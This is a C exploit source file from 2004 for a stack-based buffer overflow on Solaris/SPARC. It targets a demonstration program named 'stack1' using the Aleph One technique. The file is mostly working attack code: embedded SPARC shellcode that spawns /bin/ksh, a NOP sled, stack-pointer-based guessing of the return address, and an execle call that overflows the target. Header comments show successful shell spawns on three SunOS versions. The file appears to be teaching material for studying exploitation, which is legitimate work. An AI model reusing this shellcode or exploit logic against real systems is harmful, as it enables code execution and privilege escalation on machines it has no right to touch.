/*
 * $Id: stack1-ex.c,v 1.1.1.1 2004/07/05 19:31:16 raptor Exp $
 *
 * stack1-ex.c - stack1.c exploit (Solaris/SPARC stack-based)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This is a classic exploit demonstrating the Aleph-One technique for
 * the exploitation of stack-based buffer overflows on Solaris/SPARC.
 * Here i'm using an hacked get_sp() function, also compatible with
 * gcc-3.2.2 without optimization. For more details, see:
 *
 * http://archives.neohapsis.com/archives/vuln-dev/2004-q1/0031.html
 *
 * This is my first exploitation attempt with Solaris/SPARC architecture.
 * See also the interesting whitepaper by David Litchfield titled "Buffer 
 * Overflows on the SPARC Architecture".
 *
 * bash-2.05$ uname -a
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.2
 * bash-2.05$ ./stack1-ex -400
 * Using ret address       : 0xffbffcb8
 * $ 
 *
 * bash-2.05$ uname -a
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.3.2
 * bash-2.05$ ./stack1-ex -400
 * Using ret address       : 0xffbefc50
 * $ 
 *
 * bash-2.05$ uname -a
 * SunOS sparchina 5.6 Generic_105181-05 sun4c sparc SUNW,Sun_4_50
 * bash-2.05$ gcc --version
 * 2.95.3
 * bash-2.05$ ./stack1-ex -400
 * Using ret address       : 0xeffffcb0
 * $ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

#define VULN 	"./stack1"		// the vulnerable program
#define BUF	256 + 16 + 64 + 1	// size of the evil buffer
#define RET	0xffbffc54		// our default retaddr
#define NOP	0x801c4011		// Solaris/SPARC NOP sled

char sc[] = /* Solaris/SPARC shellcode (48 bytes) */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/*
 * get_sp(): get current stack pointer address (hacked version)
 */
int get_sp()
{
#ifndef GCC_OPT
	__asm__("mov %sp,%g1");
	__asm__("mov %g1,%i0");
#else
	__asm__("mov %sp,%o0");
#endif
}

int main(int argc, char **argv)
{
	char 	buf[BUF];
	int 	*p;
	int 	ret = RET, i, n;

	if (argc > 1)
		ret = get_sp() - atoi(argv[1]); /* try -400 */
	if (ret % 4)
		ret = (ret / 4) * 4;

	/* fill the whole buffer with retaddr - 8 */
	p = (int *)(buf);
	for (i = 0; i < BUF - 1; i += 4)
		*p++ = ret - 8;
	*p = 0x0;

	/* pad the first half of buffer with NOPs */
	p = (int *)(buf);
	for (i = 0; i < (BUF - 1) / 2; i += 4)
		*p++ = NOP;

	/* place the shellcode after the NOPs */
	for (n = 0; n < strlen(sc); n++)
		buf[i++] = sc[n];
		
	/* print some output */
	fprintf(stderr, "Using ret address\t: 0x%p\n", ret);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf, NULL, NULL);
	perror("execle");
}
